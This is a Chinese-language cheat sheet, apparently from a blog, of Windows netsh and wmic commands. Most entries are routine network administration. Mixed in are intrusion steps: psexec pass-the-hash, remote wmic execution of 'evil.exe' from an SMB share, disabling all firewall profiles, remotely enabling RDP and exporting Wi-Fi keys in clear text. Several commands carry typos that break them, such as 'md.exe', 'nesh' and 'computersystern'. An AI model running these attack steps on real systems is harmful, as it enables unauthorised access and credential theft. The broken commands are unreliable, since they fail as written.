# 修改對應網卡的獲取IP的形式,如改為dhcp
netsh interface ipv4 set address name="以太網" source=dhcp
# 修改對應網卡的獲取IP的形式,如改為static 並設置相關的ip gateway netmask dns等
netsh interface ipv4 set address name="以太網" source=static addr=192.168.1.100 mask=255.255.255.0 gateway=192.168.1.1
netsh interface ip set address name="以太網" source=static addr=192.168.1.100 mask=255.255.255.0 gateway=192.168.1.1 gwmetric=0
或者:
netsh interface ip set address name="以太網" static 192.168.1.100 255.255.255.0 192.168.1.1 1
# 主DNS
netsh interface ipv4 set dns name="以太網" source=static addr=114.114.114.114 register=PRIMARY
或
netsh interface ipv4 set dns name="以太網" static 114.114.114.114
# 主輔DNS
netsh interface ipv4 set dns name="以太網" static 114.114.114.114 114.114.115.115 both
或單獨輔DNS
netsh interface ip add dns name="以太網" 114.114.115.115 index = 2
# 如果您的PC已配置為使用DHCP,則希望將適配器配置為使用DHCP中的DNS,並運行以下命令
netsh interface ip set dnsservers name="以太網" source = dhcp
# 關閉當前配置的防火牆
netsh advfirewall set currentprofile state off
# 關閉所有防火牆
netsh advfirewall set all profiles state off
# 本機windows端口轉發
啟用轉發
netsh interface port proxy add v4tov4 listenport=3000 listenaddress=192.168.1.100 connectport=4000 connectaddress=192.168.1.120
停止轉發
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=192.168.1.100
# 列舉用戶登錄時長 模糊搜索管理員用戶
wmic netlogin where (name like "%administrator%") get numberoflogons
# 以system權限來執行遠程命令(IP是遠程的IP地址)
psexec /accepteula \ip -s md.exe
# 利用用戶hash來登錄遠程主機並執行命令(IP是遠程的IP地址)
psexec /acceptula \ip -u Domain\\user -p LM:NTLM cmd.exe /c dir c:\
# 使用用戶名密碼通過smb來執行遠程主機上的命令或者文件
wmic /node: targetiP /user:domain\\user /password:password process call create "\ smbiP \share\evil.exe"
# 卸載軟件
wmic product get name /value # 獲取軟件名稱
wmic product where name="11XXX" call uninstall /nointeractive
# 判定遠程登錄用戶
wmic /node:remotecomputer computersystern get username
# 實時獲取遠程主機進程
wmic /node:machinename process list brief /every:1
# 開啟遠程rdp
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections="O" call SetAllowTSConnections "1"
# 重置 Winsock 目錄
netsh winsock reset
netsh語法
netsh[ -a AliasFile] [ -c Context ] [-r RemoteComputer] [ -u [ DomainName\ ] UserName ] [ -p Password | *] [{NetshCommand | -f ScriptFile}]
說明:https://docs.microsoft.com/zh-cn/windows-server/networking/technologies/netsh/netsh-contexts
# 網絡設置的備份與恢復
備份操作: netsh dump >bak18.txt
恢復操作: nesh exec bak18.txt
# 用命令改IP,如下
C:/>netsh (進入設置模式)
netsh>interface
interface>ip
interface ip>set address "本地連接" static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
# 導出已有配置文件
netsh wlan export profile key=clear(clear表示以明文方式顯示密碼)
# 常用的netsh wlan命令
列出配置文件:netsh wlan show profile
導出配置文件:netsh wlan export profile key=clear
刪除配置文件:netsh wlan delete profile name=""
添加配置文件:netsh wlan add profile filename=""
連接wifi:netsh wlan connect name=""
列出接口:netsh wlan show interface
開啟接口:netsh interface set interface "Interface Name" enabled
列出所有可連接wifi詳細信息:netsh wlan show networks mode=bssid
# 開啟和禁用(wlan0和eth0代表網卡的名稱)
禁用無線網卡:netsh interface set interface wlan0 disabled
啟用無線網卡:netsh interface set interface wlan0 enabled
禁用有線網卡:netsh interface set interface eth0 disabled
啟用有線網卡:netsh interface set interface eth0 enabled
更詳細的請查看命令幫助
閱讀更多 心欲無痕 的文章